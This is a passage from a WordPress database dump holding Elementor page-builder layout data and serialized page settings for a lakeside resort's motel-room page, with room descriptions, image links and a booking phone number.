"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8d9e2d7\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"05189bb\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"98a2c62\"}]},\"elements\":[{\"id\":\"c4ca5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"09a713d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"6013a89\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"53f4487\"}]},\"elements\":[{\"id\":\"ac2eaf0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b840cab\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8273103\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c6886a7\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4d70721\"}]},\"elements\":[{\"id\":\"5e1242e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"dce0399\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"fb17f13\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"135ef06\"}]},\"elements\":[{\"id\":\"73dce17\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"be68b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"25fb2d9\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"798dfa9\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"0d85eaa\"}]},\"elements\":[{\"id\":\"39c4f5c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4b6ce55\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"410b766\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"53343c3\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c58249a\"}]},\"elements\":[{\"id\":\"1358f4b\",\"elType\":\"widget\",\"settings\":{\"title\":\"My Skill\",\"inner_text\":\"Web Designer\"},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"ac94c6b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1710850\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"e2ecbc6\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"78a15f1\"}]},\"elements\":[{\"id\":\"515716f\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"star-rating\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"72ea510\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"fef99a1\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"72c6365\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e9fb18c\"}]},\"elements\":[{\"id\":\"6278c71\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"407a3d7\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"bea0196\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d5a949b\"}]},\"elements\":[],\"isInner\":false},{\"id\":\"38ed738\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7421f83\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"67bca18\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"53dc408\"}]},\"elements\":[],\"isInner\":false},{\"id\":\"c9dc8f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"bc23a91\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2872b98\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"0c0ad73\"}]},\"elements\":[],\"isInner\":false},{\"id\":\"b7e2a48\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"242e6c0\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"93b8b57\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c5b778e\"}]},\"elements\":[],\"isInner\":false},{\"id\":\"7ac3d00\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"261300e\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"e1ca420\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b00008e\"}]},\"elements\":[],\"isInner\":false},{\"id\":\"8838ce8\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"87ad89a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"54a984c\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"a4145ee\"}]},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1765,46,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(1766,738,'_wp_page_template','default'),(1767,738,'_elementor_edit_mode','builder'),(1768,738,'_elementor_version','0.4'),(1769,738,'_elementor_data','[{\"id\":\"4e2861b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8c3aa6f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"659b4e4\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"9e402ae\"}]},\"elements\":[{\"id\":\"01c17bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1647b79\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"02c2bab\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"65482ce\"}]},\"elements\":[{\"id\":\"a7e9fc6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong> Stay in a Motel Room \\u2013 <\\/strong><strong><a href=\\\"http:\\/\\/ashbyresort.com\\/calendar\\/\\\">Call us at 218-747-2959 to book it<\\/a>\\u00a0 <br \\/><\\/strong><\\/p><p><strong>All motel rooms are available nightly, weekly and long term.<\\/strong><\\/p><p><strong>We have motel units with kitchens \\u201cKitchenettes\\u201d<br \\/> and we have units without kitchens \\u201cSleepers\\u201d.<br \\/>or our Lakeside Villa.<br \\/><\\/strong><\\/p><p>All units are lakeside on level grounds with a park-like setting that is even more captivating during our beautiful sunsets.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"50c4bfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"85b2dfc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"3b6597b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ce21cee\"}]},\"elements\":[{\"id\":\"4e66d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Motel.jpg\",\"id\":302},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"640\",\"height\":\"300\"},\"align\":\"center\",\"image_border_border\":\"solid\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6542a16\",\"elType\":\"section\",\"settings\":{\"border_border\":\"solid\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9169c2a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2e3ee46\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"baa1ca0\"}]},\"elements\":[{\"id\":\"23e9738\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1246eae\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"4831bc2\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"88fa4da\"}]},\"elements\":[{\"id\":\"808cf47\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kitchenettes #1, 3, 5 &amp; 7<\\/strong><\\/p><p>Are 1 bedroom \\u2013 1 bathroom with 2 double beds Maximum people 4<\\/p><p>also included in a Kitchenette unit is:<br \\/> A Stove (Ovens in #3 &amp; 7 only), microwave, refrigerator, coffee maker, toaster, pots, pans, dishes, TV and airconditioning<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"03f13de\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"194384d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2c409aa\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4855a6f\"}]},\"elements\":[{\"id\":\"c025d32\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"4f25776\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9599ca8\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"881e1ea\"}]},\"elements\":[{\"id\":\"7e98a34\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4153.jpg\",\"id\":466}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"1d86d5d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"f3c51bd\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"102abed\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d557fa6\"}]},\"elements\":[{\"id\":\"015be59\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4149.jpg\",\"id\":464}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"4985a47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"24ea3dc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"15ff13c\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"67e542a\"}]},\"elements\":[{\"id\":\"5c5981a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4151.jpg\",\"id\":465},\"image_border_width\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true},\"image_border_color\":\"#7a7a7a\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7dad932\",\"elType\":\"section\",\"settings\":{\"border_border\":\"solid\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"0e0de0e\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8f3928c\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b94c487\"}]},\"elements\":[{\"id\":\"6cb5af4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"fbba353\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9cdbe3f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e33d470\"}]},\"elements\":[{\"id\":\"641f976\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Sleepers #2, #4 and #6<\\/strong><\\/p><p>Are one bedroom \\u2013 1 bathroom and 1 Double Bed with a hide a bed sofa in the main living area.<br \\/> Maximum people 4.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9188508\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"f9f470e\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ff282b8\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"9fa2d93\"}]},\"elements\":[{\"id\":\"7961de2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"f2e388c\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2d6e7ec\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"dca8900\"}]},\"elements\":[{\"id\":\"a81ffee\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN42011.jpg\",\"id\":541}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"2043fd8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1d2713d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"93c74aa\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"38e4916\"}]},\"elements\":[{\"id\":\"99dab09\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN41971.jpg\",\"id\":539},\"image_border_width\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true},\"image_border_color\":\"#7a7a7a\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"19dbffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"059aaf5\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"494138e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c136dd1\"}]},\"elements\":[{\"id\":\"05b0b6f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN42001.jpg\",\"id\":540}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18f6ad5\",\"elType\":\"section\",\"settings\":{\"border_border\":\"solid\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"6a3f9d8\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"bc9849a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4500032\"}]},\"elements\":[{\"id\":\"c16586f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"e51bd4d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"aa61889\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"06c9f69\"}]},\"elements\":[{\"id\":\"8137cdf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lakeside Villa #9<\\/strong><\\/p><p>Unit # 9 is one of the most popular units newly remodeled in 2015. This unit has 2 bedrooms. One bedroom has a queen bed with a sliding glass door to the lake.<br \\/>The second bedroom has two single beds. The bathroom has a large walk in shower. This unit also has a door off the kitchen to go out to the lake.<br \\/>Maximum people 4. No pets. No Smoking.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4bba88e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a85728e\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8d8736a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"0567beb\"}]},\"elements\":[{\"id\":\"c9c91ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"cdfea3f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"5fc4265\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"39410d5\"}]},\"elements\":[{\"id\":\"f96e083\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4157.jpg\",\"id\":468}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"a7e2877\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2e0b5c9\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"5244ee8\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"955d6bd\"}]},\"elements\":[{\"id\":\"0172296\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4155.jpg\",\"id\":467},\"image_border_width\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true},\"image_border_color\":\"#7a7a7a\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"96c0fd8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"bdf024f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"f3002db\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"2bff9ec\"}]},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1770,738,'_elementor_template_type','post'),(1772,738,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(1774,739,'_wp_page_template','default'),(1775,739,'_elementor_edit_mode','builder'),(1776,739,'_elementor_version','2.5.12'),(1777,739,'_elementor_data','[{\"id\":\"4e2861b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8c3aa6f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"659b4e4\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"9e402ae\"}]},\"elements\":[{\"id\":\"01c17bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1647b79\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"02c2bab\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"65482ce\"}]},\"elements\":[{\"id\":\"a7e9fc6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong> Stay in a Motel Room \\u2013 <\\/strong><strong><a href=\\\"http:\\/\\/ashbyresort.com\\/calendar\\/\\\">Call us at 218-747-2959 to book it<\\/a>\\u00a0 <br \\/><\\/strong><\\/p><p><strong>All motel rooms are available nightly, weekly and long term.<\\/strong><\\/p><p><strong>We have motel units with kitchens \\u201cKitchenettes\\u201d<br \\/>and we have units without kitchens \\u201cSleepers\\u201d.<br \\/>or our 2 bedroom Lakeside Villa.<br \\/><\\/strong><\\/p><p>All units are lakeside on level grounds with a park-like setting that is even more captivating during our beautiful sunsets.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"50c4bfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"85b2dfc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"3b6597b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ce21cee\"}]},\"elements\":[{\"id\":\"4e66d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Motel.jpg\",\"id\":302},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"640\",\"height\":\"300\"},\"align\":\"center\",\"image_border_border\":\"solid\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6542a16\",\"elType\":\"section\",\"settings\":{\"border_border\":\"solid\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9169c2a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2e3ee46\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"baa1ca0\"}]},\"elements\":[{\"id\":\"23e9738\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1246eae\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"4831bc2\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"88fa4da\"}]},\"elements\":[{\"id\":\"808cf47\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kitchenettes #1, 3, 5 &amp; 7<\\/strong><\\/p><p>Are 1 bedroom \\u2013 1 bathroom with 2 double beds Maximum people 4<\\/p><p>also included in a Kitchenette unit is:<br \\/> A Stove (Ovens in #3 &amp; 7 only), microwave, refrigerator, coffee maker, toaster, pots, pans, dishes, TV and airconditioning<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"03f13de\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"194384d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2c409aa\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4855a6f\"}]},\"elements\":[{\"id\":\"c025d32\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"4f25776\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9599ca8\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"881e1ea\"}]},\"elements\":[{\"id\":\"7e98a34\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4153.jpg\",\"id\":466}},\"elements\":[],\"widgetType\